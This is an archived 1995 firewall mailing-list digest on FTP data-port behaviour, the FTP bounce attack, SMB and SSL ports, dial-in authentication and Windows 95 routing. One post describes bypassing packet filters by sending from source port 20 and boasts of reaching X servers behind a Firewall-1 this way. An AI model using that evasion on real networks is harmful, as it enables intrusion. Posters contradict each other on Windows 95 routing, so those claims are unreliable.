FTP.microsoft.com initiates all data port connections from random, high-numbered TCP ports, instead of the RFC-mandated port 20. This apparently was intentional- there's a registry setting called "EnablePortAttack" that, when turned on, will cause the server to initiate connections from 20 again. Of course, the reason I noticed this is that we were using a filtering rule for some machines in our firewall that allowed incoming TCP connections from port 20 to high-numbered destination ports so that outbound FTP would work. Since ftp.microsoft.com's FTP-data connections weren't coming from port 20, they weren't allowed in. I don't completely understand the rationale behind this "fix", and I'm wondering if there's some general weakness in the FTP protocol that I'm not aware of that they're trying to address. 
I'm familiar with the "FTP Bounce" attack (see ftp://avian.org/random/ftp-attack), and I'm wondering if this is some strange way of ensuring that somebody using an NT FTP server as the middleman in such an attack isn't initiating connections from a low-numbered port. Anybody know more? -Robert -- Robert Dana (713) 650-6522 x40 WorldCom Director of Network Services Wolf Communications, Houston, TX Go WorldCom! From firewalls-owner Wed Oct 11 17:13:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA16529 for firewalls-outgoing; Wed, 11 Oct 1995 17:02:28 -0700 Received: from databus.databus.com (databus.databus.com [198.186.154.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA16518 for ; Wed, 11 Oct 1995 17:02:25 -0700 Date: Wed, 11 Oct 95 20:00 EDT Message-ID: <9510112000.AA22948@databus.databus.com> From: Barney Wolff To: Andre Soto , firewalls@GreatCircle.COM Subject: Re: wu-ftp Content-Length: 618 Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Andre Soto > Date: Wed, 11 Oct 95 17:52:06 -0400 > > I have wu-ftp pretty much set up. I am experiencing one problem though. > When I ftp into my site I cannot see a listing of my filenames upon > executing ls or dir. I have played with the permissions and the ownership. > I even went as far as to set everything to 777. What have I done wrong? wu-ftpd expects ls to be at /bin/ls - if it's not, because it's elsewhere or because you're chroot'd, it can't do the dir. Look for the string "/bin/ls" in ftpd.c and either fix it or put ls there. 
Barney Wolff From firewalls-owner Wed Oct 11 17:37:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA16824 for firewalls-outgoing; Wed, 11 Oct 1995 17:09:42 -0700 Received: from sdwsys (lig.cinti.net [204.248.145.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA16811 for ; Wed, 11 Oct 1995 17:09:38 -0700 Received: by sdwsys (Linux Smail3.1.28.1 #20) id m0t3BAu-0009z2C; Wed, 11 Oct 95 20:07 EDT Message-Id: From: sdw@lig.net (Stephen D. Williams) Subject: Re: Windows 95 exporting To: sansom@fshops.sfsu.edu (Rob Sansom) Date: Wed, 11 Oct 1995 20:07:03 -0400 (EDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Rob Sansom" at Oct 11, 95 02:22:56 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1223 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 139 mainly, but tcp/udp 138,139, and another I can't remember off the top of my head are mentioned in reference to SMB networking. 139 tcp is the main one. (There is smb service and nmb (name, optional) involved.) > I have a friend that recently set up some Windows 95 PC's on his network, > and some of the people that use them say that they can access their > 'Published' directories from the Internet. I don't have access to any > Windows 95 machines (the only PC that is running it doesn't work), and I am > supposed to help him configure his router as a packet filter. I imagine > the 'Published' feature is something similar to Unix NFS, and uses a TCP > port number for client access (?). If this is so, does anyone out there in > the world of PC's know what this port number is so I can filter it with a > router? > > Thanks in advance, > > Rob Sansom > Franciscan Shops Inc. > sdw -- Stephen D.
Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From firewalls-owner Wed Oct 11 18:17:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA18273 for firewalls-outgoing; Wed, 11 Oct 1995 17:49:14 -0700 Received: from mom.hooked.net (mom.hooked.net [199.2.134.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA18259 for ; Wed, 11 Oct 1995 17:49:10 -0700 From: tferro@raptor.com Received: from 204.212.195.84 (bass-20.ppp.hooked.net [204.212.195.84]) by mom.hooked.net (8.6.10/8.6.5) with SMTP id RAA00991; Wed, 11 Oct 1995 17:47:12 -0700 Date: Wed, 11 Oct 1995 17:47:12 -0700 Message-Id: <199510120047.RAA00991@mom.hooked.net> Subject: Re: TIS FWTK? To: tony@raptor.com X-Mailer: AIR Mail 3.X (SPRY, Inc.) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Tony, If 8000 downloaded it, maybe it's true that 2500 are installed. Who knows! <---- Begin Included Message ----> Cc: Firewalls@GreatCircle.COM Date: Wed, 11 Oct 95 17:12:20 EDT From: Frederick M Avolio Sender: firewalls-owner@GreatCircle.COM Subject: Re: TIS FWTK? To: darryl@sai.com, rthomas@pamd.cig.mot.com The COAST archives should not have this nor should any other site. We cannot enforce it but we do request that people NOT copy the FWTK to other sites. Too many other sites copy once or twice and then never again. Or they copy only the source kit and not the doc kit. Or they leave off the LICENSE or README or DISCLAIMER. Our request is that people NOT put the FWTK on their FTP site nor on CDs for distribution. Over 8000 sites have retrieved the FWTK code so I'd expect that ftp.tis.com is fairly accessible and perhaps you had DNS problems when you tried.
Fred <---- End Included Message ----> --------------------------------------------------------------------------- Tony Ferro - Systems Engineer E-mail: tferro@raptor.com Raptor Systems Phone: 408.524.2990 1250 Oakmead Pkwy; Suite 210 Fax: 408.524.2988 Sunnyvale, CA 94088 Home Page: http://www.raptor.com/ --------------------------------------------------------------------------- From firewalls-owner Wed Oct 11 18:17:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA18227 for firewalls-outgoing; Wed, 11 Oct 1995 17:47:55 -0700 Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA18220 for ; Wed, 11 Oct 1995 17:47:51 -0700 Received: from wittsend.UUCP by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.16) via UUCP id AA15378 ; Wed, 11 Oct 95 20:45:51 -0400 Received: by wittsend (/\==/\ Smail3.1.28.1 #28.1) for id ; Wed, 11 Oct 95 20:42 EDT Message-Id: Subject: Re: Port question To: Chris.Brenton@newsedge.com Date: Wed, 11 Oct 1995 20:42:42 -0400 (EDT) From: "Michael H. Warfield" Cc: firewalls@greatcircle.com In-Reply-To: <9510111825.AA13540@herne.newsedge.com> from "Chris Brenton" at Oct 11, 95 06:25:41 pm X-Mailer: ELM [version 2.4 PL20] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 962 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Brenton enscribed thusly: > > Does anyone know what port 443 is used for? Check out: > http://necxdirect.necx.com > You're passed to port 8002 and then 443. Does anyone see any problems with opening > up port 443 access to the net? Port 443 is the current convention for SSL secure http (https). Secure Netscape Commerce servers and other HTTP servers which are SSL enabled (SSLeay package) use that port by default for secure encrypted connections. Port 80 continues to be used for non-secure http.
Netscape browsers when encountering an https: URL will, by default, make a call to port 443 instead of the http: default of 80. > Thanks for any help! Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From firewalls-owner Wed Oct 11 18:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA18539 for firewalls-outgoing; Wed, 11 Oct 1995 17:55:43 -0700 Received: from nexus.ptech.com (aegis.ptech.com [165.166.50.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA18532 for ; Wed, 11 Oct 1995 17:55:40 -0700 Received: from felix by nexus.ptech.com (5.x/Piedmont Technology Group) id AA15492; Wed, 11 Oct 1995 20:52:42 -0400 Date: Wed, 11 Oct 1995 20:52:40 -0400 Message-Id: <9510120052.AA15492@nexus.ptech.com> X-Sender: jnb@ptech.com X-Mailer: Windows Eudora Version 2.0.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: , From: jim.brown@ptech.com (Jim Brown) Subject: Re: Port question Sender: firewalls-owner@GreatCircle.COM Precedence: bulk TCP 443 is the conventional port that SSL-enabled HTTP uses. So you should probably apply the same policy to 443 as you would to port 80 .... Regards, Jim At 06:25 PM 10/11/95 EST, Chris.Brenton@newsedge.com wrote: >Does anyone know what port 443 is used for? Check out: > >http://necxdirect.necx.com > >You're passed to port 8002 and then 443. Does anyone see any problems with opening >up port 443 access to the net? > >Thanks for any help!
> > > > _________ ___jnb___ From firewalls-owner Wed Oct 11 18:52:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA19928 for firewalls-outgoing; Wed, 11 Oct 1995 18:28:28 -0700 Received: from commsun.its.csiro.au (commsun.its.csiro.au [152.83.8.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA19913 for ; Wed, 11 Oct 1995 18:28:18 -0700 Received: (from fit106@localhost) by commsun.its.csiro.au (8.6.10/8.6.10) id LAA17127; Thu, 12 Oct 1995 11:26:15 +1000 Date: Thu, 12 Oct 1995 11:26:14 +1000 (EST) From: Kent Fitch To: firewalls@greatcircle.com Subject: Summary: securing modem access: RADIUS or TACACS+ with PGP auth In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Last week I posted to this list asking for experiences using TACACS+ or RADIUS (or anything else) to implement dial-in modem security from dispersed terminal servers with modem pools using a central server to issue and check a PGP challenge. On Tue, 3 Oct 1995, Jim Thompson wrote: > I'm one-half, (Jes is the other half), of the team implementing > Cisco's commercial TACACS+ server. (e.g. we're under contract to Cisco.) > > It wouldn't be very hard at all to roll PGP into the 'side' of the server. > S/Key already works. > > Smallworks also makes and sells 'Netgate', a filtering firewall for > SunOS 4.1.X and Solaris 2.X, in case you've not heard of us before. > > If you want to take this off-line and discuss it, we'd be more than > happy to do so. On Tue, 3 Oct 1995 cjc@novell.com wrote: > We're in the middle of a big project to upgrade all our dial-in > gateways to use one-time password schemes. > > Right now, we've got gateways based on Livingston terminal servers, > NetWare Connect, and UnixWare.
The Livingstons and the UnixWare can talk > Radius, but NetWare Connect uses its own proprietary protocol (hey, > I just work here, I don't have power over these decisions). Anyway, > we decided to go with Enigma Logic because it supports Radius, > Tacacs, and NetWare Connect protocols, and gives you the choice of > Ansi 909 (I think that's the number) and DES-MultiSync based > challenge-response authentication, or an S/Key-like calculated > password. > > On the client end, you get the choice of using their SoftToken > Window/Mac/Unix software, a hand-held authenticator, or an > S/Key-style cheat-sheet (for the calculated password stuff only). > > You can contact them at 510-827-570. > > Christopher J. Calabrese > Network Security Architect > Novell Information Services & Technology, Florham Park, NJ > cjc@novell.com On Tue, 3 Oct 1995, Paul Krumviede wrote: > At least in theory, a RADIUS server can cause a terminal server to > send a challenge to the calling device, and relay the response back > to the server. > > The problem is that the PPP stack that gets the challenge won't know > how to do PGP signatures. So you can send the challenge to the PC, > you just can't get it to respond with anything you want. > > You might want to consider another PPP authentication mechanism, > or something that would require stronger authentication before you > give the caller any access rights to any end systems. > > Of course, one could also hack the stack (if you have access to the > source for it). > > -Paul Krumviede > MCI Bruno MAMER suggested I search his firewall archive, which contains his "picks" of firewalls, and was a URL I've now bookmarked: http://www.crpht.lu/CNS/html/PubServ/Security/Firewall/fw-mail-sum.html On Fri, 6 Oct 1995, Carl Rigney wrote: > RADIUS does support challenge-response; the RADIUS 1.16 server has a hook > for challenge-response but would need to be modified slightly depending on just > what kind of challenge and response are used.
The PortMaster already supports > its end of things. > The way it would work is that a user would enter his username and a > password (which could be a dummy if desired), the PortMaster encrypts > the password and sends that and the username to the RADIUS Server, > which can send back a reject, an accept (with all the info needed to > provide service to the user), OR the RADIUS server can send back an > access-challenge with a string that is displayed to the user, the user > enters his response (up to 16 characters) and that response is > encrypted and sent back to the RADIUS server, which can reject, accept > or challenge again. > > -- > Carl Rigney > RADIUS Liaison > Livingston Enterprises > cdr@livingston.com [I think the 16 character limit will be a problem for a PGP signed response] David Carrel thru Peter Elford as part of a separate conversation said: > Now there are ways the user can get their PGP authentication. If they > login to the exec and then run PPP, they can do it with no modifications > needed from cisco. The exec login will print ANYTHING the TACACS+ server > tells it to. So they can send the challenge and have the user send their > response, and let the TACACS+ server verify. They will need to make > modifications to their TACACS+ server. They should probably configure PPP > to require no authentication if the user already logged into an exec. > (Make the first AAA method be "if-needed".). Thanks to everyone for their input. I have not heard from anyone who has implemented PGP authentication using an Annex terminal server - if there is anyone doing this, I'd love to know how it's working.
Kent Fitch Ph: +61 6 276 6711 ITSB CSIRO Canberra Australia kent.fitch@its.csiro.au "Our lives are frittered away by detail...simplify, simplify" - HD Thoreau From firewalls-owner Wed Oct 11 19:00:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA20664 for firewalls-outgoing; Wed, 11 Oct 1995 18:58:46 -0700 Received: from ucsu.colorado.edu (ucsu.Colorado.EDU [128.138.129.83]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA20656 for ; Wed, 11 Oct 1995 18:58:41 -0700 Received: (from sieber@localhost) by ucsu.colorado.edu (8.6.12/8.6.12/CNS-3.6) id TAA00528; Wed, 11 Oct 1995 19:56:43 -0600 Date: Wed, 11 Oct 1995 19:56:40 -0600 (MDT) From: chris sieber To: firewalls@greatcircle.com Subject: campus firewall survey Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know I have already contacted a few of you, but if there are any university network administrators interested... My name is Chris Sieber and I am a graduate student in Telecommunications at the University of Colorado, Boulder. I am currently getting my thesis underway in firewall security for the campus environment and would like to know if you as a campus administrator would like to participate in a survey as part of my research. I will keep my queries to simple e-mail surveys that should only require a few answers. I will be sending them out intermittently over the next few months and I will try not to ask any sensitive information (let me know if I do). This research will be used solely for my project. I will be more than happy to share all results. Thanks for your time, please e-mail me directly if you have any questions.
Chris Sieber sieber@ucsu.colorado.edu From firewalls-owner Wed Oct 11 20:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA21997 for firewalls-outgoing; Wed, 11 Oct 1995 19:48:02 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA21990 for ; Wed, 11 Oct 1995 19:47:58 -0700 Date: Wed, 11 Oct 1995 22:46:06 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951011224606.2105dcc6@hobbes.orl.mmc.com> Subject: Microsoft FTP weird Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Robert rites: >FTP.microsoft.com initiates all data port connections from random, >high-numbered TCP ports, instead of the RFC-mandated port 20. This apparently >was intentional- there's a registry setting called "EnablePortAttack" that, >when turned on, will cause the server to initiate connections from 20 again. Suspect this may also be fairly recent. Until about a month ago I was able to connect to ftp.microsoft.com without problem but lately it has been hanging. Suspect this is the problem since the firewall is set to "paranoid". Warmly, Padgett From firewalls-owner Wed Oct 11 20:15:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA21931 for firewalls-outgoing; Wed, 11 Oct 1995 19:45:36 -0700 Received: from muturl.planet-int.net (muturl.planet-int.net [204.101.206.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA21924 for ; Wed, 11 Oct 1995 19:45:29 -0700 Received: (from yg@localhost) by muturl.planet-int.net (8.6.9/8.6.9) id WAA01204; Wed, 11 Oct 1995 22:46:39 -0400 Date: Wed, 11 Oct 1995 22:46:39 -0400 From: Yannick Gravel Subject: First and last subnet ???
To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Net&Sys Security people, Something that everybody is talking about, but not everybody is saying the same thing about subnetting: Yes, everybody agrees that we lose the first and last host of each subnet for net.iding and broadcasting. But, some are saying that I can use all subnets; but others are saying that we lose the first and last subnet... Whose truth is true.. Thanks.. Yannick Gravel System administrator -- yannick.gravel@planet-int.net From firewalls-owner Wed Oct 11 20:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA22636 for firewalls-outgoing; Wed, 11 Oct 1995 20:28:11 -0700 Received: from mail.crl.com (mail.crl.com [165.113.1.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA22629 for ; Wed, 11 Oct 1995 20:28:08 -0700 Received: from crl11.crl.com by mail.crl.com with SMTP id AA05113 (5.65c/IDA-1.5 for ); Wed, 11 Oct 1995 20:25:37 -0700 Received: by crl11.crl.com id AA13764 (5.65c/IDA-1.5 for Firewalls@GreatCircle.COM); Wed, 11 Oct 1995 20:18:53 -0700 Date: Wed, 11 Oct 1995 20:18:52 -0700 (PDT) From: Tim Keanini To: Firewalls@GreatCircle.COM Subject: 'route' and WIN95 Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just for the record. If your site has a firewall and you have people internally that use a modem pool to get to a PPP account using Windows 95....ummmm....you better hope you have set in policy the rules on modem use. Windows 95 will route between the ether and the serial so bye bye firewall. I have not seen anyone as of yet post this to the list so I just thought I would toss it out there for the record. There are other IP stacks that route so this is nothing new. This is clearly a policy issue and should be handled that way.
--blast From firewalls-owner Wed Oct 11 21:13:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA24421 for firewalls-outgoing; Wed, 11 Oct 1995 21:07:09 -0700 Received: from narq.avian.org (wet-string.avian.org [199.103.168.126]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA24407 for ; Wed, 11 Oct 1995 21:07:04 -0700 Received: (from hobbit@localhost) by narq.avian.org (8.6.12/_H*) id XAA04272; Wed, 11 Oct 1995 23:02:43 -0400 Date: Wed, 11 Oct 1995 23:02:43 -0400 From: *Hobbit* Message-Id: <199510120302.XAA04272@narq.avian.org> To: firewalls@greatcircle.com Subject: ftp-attack Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [Aha, so *that's* why the FTP server is suddenly getting hammered for that one file this evening...] I never quite understood why the spec wanted the back-connections to come from port 20 in the first place, or for that matter why the *server* was supposed to initiate back to the *client* at all. It's BROKEN, and the aforementioned whitepaper goes deeper into just why it's broken. For the server to come from a high random port doesn't invalidate the "attack", though, since there are plenty of things doable by ftp-bouncing that don't rely on coming from 20. EnablePortAttack, eh? This is in NT?? Is there any more info about the setting in a manual? Did Microsnot hack this in after reading the paper, and is there a check in the mail for giving them the idea? A quick look at ftp.billgates.com shows me that they implemented most of the full PORT command checking, i.e. only letting you PORT back to > 1024 on your own machine. Does twiddling the setting also disable the client-address checking?? [Gee, wonder if NT-ftpd is a warmed-over WU?] They *are*, however, still allowing client connects FROM any port including 20. By the way, that filtering rule is utter bunkum if an attacker binds to port 20 on his end to explore your network. 
A few nights ago I was able to hop a Firewall-1 and tickle some X servers "inside" by doing precisely that, because someone naively assumed that everything from port 20 is a harmless ftp-data connection. What to do about it? Hard problem, partially addressed by proxies and passive mode, having the occasional data connection fail, or just punting and using some other protocol. _H* From firewalls-owner Thu Oct 12 00:04:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA27359 for firewalls-outgoing; Wed, 11 Oct 1995 23:55:18 -0700 Received: from news.infoexpress.com (news.infoexpress.com [198.151.234.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA27351 for ; Wed, 11 Oct 1995 23:55:16 -0700 Received: from ix.infoexpress.com by news.infoexpress.com (InfoExpress mail) id XAA02277; Wed, 11 Oct 1995 23:50:55 -0700 Received: by ix.infoexpress.com (InfoManager Mail) id XAA00495; Wed, 11 Oct 1995 23:32:57 -0700 Message-Id: <199510120632.XAA00495@ix.infoexpress.com> From: Todd Nakano To: firewalls-digest@GreatCircle.COM Cc: todd@infoexpress.net Date: Wed, 11 Oct 95 23:32:56 -0700 Subject: Question about firewall e-mail and news groups Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I was wondering if someone could recommend any e-mail or news groups to post information about our new product which provides remote Windows TCP/IP access through firewalls. Thanks, Todd Nakano InfoExpress, Inc. 
415/969-9609 todd@infoexpress.net From firewalls-owner Thu Oct 12 00:13:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA27700 for firewalls-outgoing; Thu, 12 Oct 1995 00:08:21 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA27693 for ; Thu, 12 Oct 1995 00:08:18 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id AAA05665; Thu, 12 Oct 1995 00:06:16 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma005663; Thu Oct 12 00:06:13 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id AAA03109; Thu, 12 Oct 1995 00:03:19 -0700 From: Brian Murrell Message-Id: <199510120703.AAA03109@mocha.bctel.net> Subject: Re: 'route' and WIN95 To: blast@crl.com (Tim Keanini) Date: Thu, 12 Oct 1995 00:03:18 -0700 (PDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Tim Keanini" at Oct 11, 95 08:18:52 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1175 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As enscripted by Tim Keanini: > Just for the record. > If you site has a firewall and you have people internally that use a > modem pool to get to PPP account using Windows 95....ummmm....you better > hope you have set in policy the rules on modem use. > > Windows 95 will route between the ether and the serial so bye bye > firewall. NOT!! From what authority did you get this information, or is it rumour and FUD?? If you got your information from some{one|thing|where} authoritative you'd know that Windows 95 WILL NOT route between ANY two interfaces in the box. > I have not seen anyone as of yet post this to the list so I just thought > I would toss it out there for the record. The reason you haven't seen it yet is because it doesn't. 
> There are other IP stacks that > route so this is nothing new. This is clearly a policy issue and should > be handled that way. True on both accounts. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Thu Oct 12 01:13:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA28840 for firewalls-outgoing; Thu, 12 Oct 1995 01:03:55 -0700 Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA28830 for ; Thu, 12 Oct 1995 01:03:51 -0700 Received: by mail.swip.net with UUCP (8.6.8/3.01) id JAA05876; Thu, 12 Oct 1995 09:09:01 +0100 Received: from lda.leissner.se by lda.leissner.se id aa13469; 12 Oct 95 8:58 SNT X-Sender: pol@lda X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Date: Thu, 12 Oct 1995 08:58:50 +0200 To: Brian Murrell From: Peter Olsson Subject: Re: 'route' and WIN95 Cc: Firewalls@greatcircle.com Message-ID: <9510120858.aa13469@lda.leissner.se> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 00:03 1995-10-12 -0700, you wrote in Firewalls@greatcircle.com: >As enscripted by Tim Keanini: >> Windows 95 will route between the ether and the serial so bye bye >> firewall. > >NOT!! From what authority did you get this information, or is it rumour and >FUD?? If you got your information from some{one|thing|where} authoritative >you'd know that Windows 95 WILL NOT route between ANY two interfaces in >the box. Yes it will, at least in build 490. I tried it successfully in build 490, routing ip-traffic from ethernet to isdn and reverse. I tried it once in release, but the other end of the isdn was not properly configured, so I didn't get it to work and I had no time to change the configuration. 
Could be that it doesn't work at all in release, but what strange reason would Microsoft have to include this functionality in build 490 and then remove it in release??? I would really like to know why (almost) everyone is talking about it not being possible, is this something Microsoft has stated or is it some global rumour? If anyone has any ideas on this topic, I am very interested. Please cc me directly as I don't follow this mailing list. ----------------------------------------------------------------- Peter Olsson Email: pol@leissner.se Leissner Data AB Tel: 0520 - 490 511 (direct) Box 912 Tel: 0520 - 200 00 (switchboard) 461 29 TROLLHÄTTAN Fax: 0520 - 200 89 From firewalls-owner Thu Oct 12 01:30:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA28601 for firewalls-outgoing; Thu, 12 Oct 1995 00:45:08 -0700 Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA28592 for ; Thu, 12 Oct 1995 00:45:04 -0700 From: gblolmxb@ibmmail.com Message-Id: <199510120745.AAA28592@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R2) with BSMTP id 2812; Thu, 12 Oct 95 03:43:06 EDT Date: Thu, 12 Oct 1995 03:46:21 EDT To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Firewall Questionnaire Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking at possible commercial firewall products as my employer may be getting a direct Internet connection soon. In order to help the selection process, I have sent a list of questions to several manufacturers and suppliers, which I list below; does anyone think I've missed anything out? It is expected that XXXXX would want to offer the following services to its employees: WWW access, FTP gets, outward bound Telnet, feed for an internal Newsgroup server.
Please note that electronic mail (SMTP) is not desired; this is fulfilled via other channels. This raises the issue of DNS, which has not yet been resolved; XXXX may look to the Internet Provider to supply this service.

QUESTIONNAIRE

1. Would you describe your product as:
   a. A circuit firewall?
   b. An application firewall?
   c. A hybrid of the above?
   d. Something else (please elaborate)?
2. Is your firewall:
   a. A software-only solution?
   b. A hardware and software solution?
   c. Something else (please elaborate)?
3. On what hardware platform does your firewall run?
4. What operating system does your firewall run on?
5. What physical network topology does the hardware support:
   a. Ethernet?
   b. Token ring?
   c. Something else (please elaborate)?
6. How is the firewall managed/configured? (e.g. by use of telnet, serial port, etc.)
7. What sort of user interface is used to manage the firewall?

XXXXX would want to deny access to many of the TCP and UDP protocol suite at the router using packet filtering. If this were not possible, the following protocols should be denied access by the firewall. Please indicate, for each protocol, whether this is possible, and whether the firewall itself will respond to them (e.g. incoming Telnet).

8. ICMP.
9. RIP.
10. SMTP.
11. Incoming Telnet.
12. All incoming RPC-type protocols (NFS, NIS).
13. TFTP.
14. FTP (incoming).
15. All 'r' commands.
16. MBone and other IP over IP protocols.
17. X11.
18. Is a 'sanitised' version of finger supported?
19. Is there a proxy service for FTP?
20. Is there a proxy service for Telnet?
21. Is there a proxy service for NNTP?
22. Is there a proxy service for HTTP?
23. What sort of bandwidth of Internet connection can your firewall handle?
24. How many concurrent IP circuits can your product handle?
25. XXXX operates on a commercial basis internally, and may wish to charge departments and users for their usage. Does your product have this facility built in?
26. How does your product react to potential security breaches?
27. Does your firewall assist in preventing outward-bound misuse?
28. Do you offer security consultancy? If so, at what cost?
29. Do you have any reference sites whom XXXX may contact in the future?
30. What would a suitable solution cost, assuming a 64Kbps leased line connection? What sort of maintenance and support is offered and at what cost?
31. Do you have any independent evaluations (e.g. magazine review) of your product?
32. Is there anything else you wish to tell us about your firewall product(s)?

Mark.

From firewalls-owner Thu Oct 12 03:00:16 1995
Date: Thu, 12 Oct 1995 10:42:00 +0100 (MET)
From: Kim Wohlert
Subject: Re: Windoze NT C2 ?
To: "A. Padgett Peterson, P.E. Information Security"
Cc: Firewalls@GreatCircle.COM

>From: "A. Padgett Peterson, P.E. Information Security"
>Date: Wed, 11 Oct 1995 17:25:08 -0400 (EDT)
>Subject: Windoze NT C2 ?
>
>Kim writes:
>>I must correct you here. Both of the above Compaqs come with a network
>>interface card built in, so no configuration is possible without a card.
>>Thus I would assume the C2 certification covers that.
>
>Marketeers thrive on assumptions. To quote: "These are designated as file
>servers but were evaluated only for use as stand-alone workstations with no
>networking capability." Is that explicit enough?
>

Thanks for your reply.
Where is that quote from? When I first saw it, I read it as a comment from the poster, not a statement of fact. And I am not a marketeer (any more than any other consultant who sells his/her services).

Regards
Kim
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Kim Wohlert          |Internet: Kim.Wohlert@mainz.dk
erik mainz a/s       |X.400: c=DK a=DK400 p=Minerva
Dortheavej 7         |       o=mainz s=Wohlert g=Kim
DK-2400 Copenhagen   |Phone: +45 38 34 77 88
Denmark              |Fax:   +45 31 19 16 25
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
I guess sometimes there just aren't enough stones to throw. -Forest Gump

From firewalls-owner Thu Oct 12 04:13:16 1995
From: "Johnson-Bryden, Ian"
